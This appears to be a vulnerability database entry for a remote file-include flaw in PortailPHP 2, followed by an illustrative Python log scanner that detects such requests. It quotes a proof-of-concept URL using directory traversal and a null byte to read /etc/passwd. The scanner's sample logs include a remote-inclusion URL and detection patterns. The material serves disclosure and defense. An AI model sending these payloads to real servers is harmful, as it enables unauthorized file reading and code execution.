Vendor: PortailPHP
By: Unknown
CVSS: 7.5 (HIGH)
Vulnerability: Remote File Inclusion
CWE: Unknown
Product Name: PortailPHP
Affected Version From: PortailPHP 2
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: a:portailphp:portailphp:2
Platforms Tested: Unknown

PortailPHP Multiple Remote File Include Vulnerabilities

The PortailPHP application is prone to multiple remote file-include vulnerabilities due to improper sanitization of user-supplied input. An attacker can exploit these vulnerabilities to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process, potentially leading to unauthorized access. The specific vulnerability occurs in PortailPHP 2, but other versions may also be affected.

Mitigation:

To mitigate these vulnerabilities, it is recommended to apply the latest security patches or updates provided by the vendor. Additionally, input validation and sanitization should be implemented to prevent malicious file inclusions.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22381/info
 
PortailPHP is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
 
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
 
PortailPHP 2 is vulnerable to these issues; other versions may also be affected. 


http://www.example.com/mod_news/goodies.php?chemin=../../../../../../../../../../../../../etc/passwd%00
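
A log check for the request shape shown above, added here as an example and not taken from PortailPHP or from the original advisory: it scans web access logs for a "chemin" parameter whose decoded value carries directory traversal, a null byte, or a URL scheme. The log lines are constructed samples, and the function names and the three rules are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines for illustration; not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /mod_news/goodies.php?chemin=../../../etc/passwd%00 HTTP/1.1" 200 512
192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /mod_news/goodies.php?chemin=http%3A%2F%2Fhost.invalid%2Fx.txt HTTP/1.1" 200 90
192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /mod_news/goodies.php?chemin=%252e%252e%252fconf HTTP/1.1" 404 0
192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /mod_news/goodies.php?id=4 HTTP/1.1" 200 2048
192.0.2.14 - - [01/Jan/2024:10:00:20 +0000] "GET /mod_news/goodies.php?chemin=mod_news HTTP/1.1" 200 4096
"""

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
SCHEME = re.compile(r"[a-z][a-z0-9+.\-]*://", re.IGNORECASE)

def fully_decode(value, rounds=3):
    """Percent-decode until stable so nested encoding cannot hide the value."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return the reasons a path-like parameter value looks unsafe."""
    value = fully_decode(value)
    reasons = []
    if "\x00" in value:
        reasons.append("null-byte")
    if TRAVERSAL.search(value):
        reasons.append("traversal")
    if SCHEME.match(value):
        reasons.append("url-scheme")
    return reasons

def scan(log_text, param="chemin"):
    """Return (client, reasons) for each request whose `param` value is suspicious."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name == param and (reasons := classify(value)):
                findings.append((line.split()[0], reasons))
    return findings
```

The same classify() rules can serve as a server-side reject list in front of the application, though an allowlist of known module paths is the stronger form of the input validation recommended above.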